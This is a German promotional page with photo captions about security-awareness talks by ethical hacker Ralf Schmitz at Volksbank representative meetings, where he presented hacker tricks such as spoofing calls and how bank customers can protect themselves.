Der IT-Sicherheits-Vortrag zur Aufklärung, Schulung und Sensibilisierung von Ralf Schmitz ist ein weiterer Schritt zur Sicherheit und dient als zusätzliche Maßnahme, das Sicherheitsbewusstsein der Teilnehmenden dafür zu schärfen. Deshalb stellt der Experte u. a. aktuelle Hackertools vor und wie sich Privatpersonen und Finanzinstitute davor schützen können. Darüber hinaus präsentiert er aktuelle Fallbeispiele aus der Bankenpraxis sowie viele Tricks und Abkürzungen im Internet.

Auszüge eines Live-Auftrittes von Ethical-Hacker Ralf Schmitz bei einer Vertreterversammlung einer Volksbank

– Von den Vorbereitungen bis zum Live-Auftritt von Ralf Schmitz –

Erst im Juni 2023 präsentierte Ralf Schmitz wieder bei einigen Vertreterversammlungen von Volksbanken Hackertricks und wie Bankkunden sich davor schützen können.

In einer Bilderreihe können Sie einen kurzen Einblick gewinnen über die Abläufe seines Impulsvortrages.

Die Vorbereitung der Veranstaltung für 350 Gäste!

Ralf Schmitz stellt dem Publikum die Hackertricks vor.

Der Beginn und Auftritt von Hacker Ralf Schmitz.

Die Themen werden vorgestellt.

Spoofing Anrufe liegen voll im Trend.

Ralf Schmitz beim Hacking von Bankenseiten.

Die heiße Phase mit Live Angriffen.

Vertreterversammlung bei einer Volksbank

Jeder Platz wurde besetzt.

Die Vorbereitung für das Buffet vor dem Event der Vertreterversammlung.

Die Vorbereitung für das Buffet vor dem Event der Vertreterversammlung

Hacker Ralf Schmitz bei der Arbeit.

Volles Haus bei dieser Veranstaltung.